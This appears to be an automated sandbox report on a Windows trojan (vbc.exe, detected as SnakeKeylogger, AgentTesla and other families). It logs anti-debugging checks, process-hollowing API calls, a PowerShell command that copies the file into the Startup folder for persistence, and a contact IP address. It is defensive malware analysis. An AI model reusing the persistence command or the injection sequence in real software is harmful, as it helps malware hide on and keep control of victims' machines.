0.958609271523

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 19, 2021, 7:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 19, 2021, 7:13 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 19, 2021, 7:13 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 9e528b6202a71a06161f992aa2fd210f0e9b6e26
buffer	Buffer with sha1: c7e45e550d183f01b5c9d6894d333f43e8389145

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2552 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000254	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Aug. 19, 2021, 7:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELì5hNà rpÐ@@.text pr ` base_address: 0x00400000 process_identifier: 2552 process_handle: 0x00000254	1	1	0
WriteProcessMemory Aug. 19, 2021, 7:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2552 process_handle: 0x00000254	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Aug. 19, 2021, 7:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELì5hNà rpÐ@@.text pr ` base_address: 0x00400000 process_identifier: 2552 process_handle: 0x00000254	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2388 called NtSetContextThread to modify thread in remote process 2552
NtSetContextThread Aug. 19, 2021, 7:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4313200 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000250 process_identifier: 2552	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2388 resumed a thread in remote process 2552
NtResumeThread Aug. 19, 2021, 7:04 p.m.	thread_handle: 0x00000250 suspend_count: 1 process_identifier: 2552	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Generates some ICMP traffic

File has been identified by 26 AntiVirus engines on VirusTotal as malicious (26 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.2698e6b35f99ca40
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_90% (W)
BitDefenderTheta	Gen:NN.ZemsilF.34088.sm0@a41oJXn
Cyren	W32/MSIL_Kryptik.FBP.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Kryptik.ACFG
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Avast	FileRepMalware
DrWeb	Trojan.MulDropNET.49
McAfee-GW-Edition	BehavesLike.Win32.Generic.fc
SentinelOne	Static AI - Malicious PE
MAX	malware (ai score=99)
Microsoft	Trojan:MSIL/SnakeKeylogger.DX!MTB
AhnLab-V3	Trojan/Win.Generic.C4581910
McAfee	AgentTesla-FDBQ!2698E6B35F99
VBA32	Trojan.MSIL.Formbook
Malwarebytes	Malware.AI.4067576920
Fortinet	MSIL/Kryptik.ACFG!tr
MaxSecure	Trojan.Malware.300983.susgen
AVG	FileRepMalware
Qihoo-360	HEUR/QVM03.0.5E77.Malware.Gen

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

47.91.170.222:80

Executed a process and injected code into it, probably while unpacking (16 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 19, 2021, 7:04 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2388	1	0
NtResumeThread Aug. 19, 2021, 7:04 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2388	1	0
NtResumeThread Aug. 19, 2021, 7:04 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2388	1	0
CreateProcessInternalW Aug. 19, 2021, 7:04 p.m.	thread_identifier: 2112 thread_handle: 0x00000174 process_identifier: 1048 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "PowerShell" copy-item 'C:\Users\test22\AppData\Local\Temp\vbc.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NewTemp.exe' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000022c	1	1
CreateProcessInternalW Aug. 19, 2021, 7:04 p.m.	thread_identifier: 2364 thread_handle: 0x00000250 process_identifier: 2552 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000254	1	1
NtGetContextThread Aug. 19, 2021, 7:04 p.m.	thread_handle: 0x00000250	1	0
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2552 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000254	1	0
WriteProcessMemory Aug. 19, 2021, 7:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELì5hNà rpÐ@@.text pr ` base_address: 0x00400000 process_identifier: 2552 process_handle: 0x00000254	1	1
WriteProcessMemory Aug. 19, 2021, 7:04 p.m.	buffer: base_address: 0x00401000 process_identifier: 2552 process_handle: 0x00000254	1	1
WriteProcessMemory Aug. 19, 2021, 7:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2552 process_handle: 0x00000254	1	1
NtSetContextThread Aug. 19, 2021, 7:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4313200 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000250 process_identifier: 2552	1	0
NtResumeThread Aug. 19, 2021, 7:04 p.m.	thread_handle: 0x00000250 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Aug. 19, 2021, 7:13 p.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 1048	1	0
NtResumeThread Aug. 19, 2021, 7:13 p.m.	thread_handle: 0x000002f0 suspend_count: 1 process_identifier: 1048	1	0
NtResumeThread Aug. 19, 2021, 7:13 p.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 1048	1	0
NtResumeThread Aug. 19, 2021, 7:13 p.m.	thread_handle: 0x00000498 suspend_count: 1 process_identifier: 1048	1	0

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All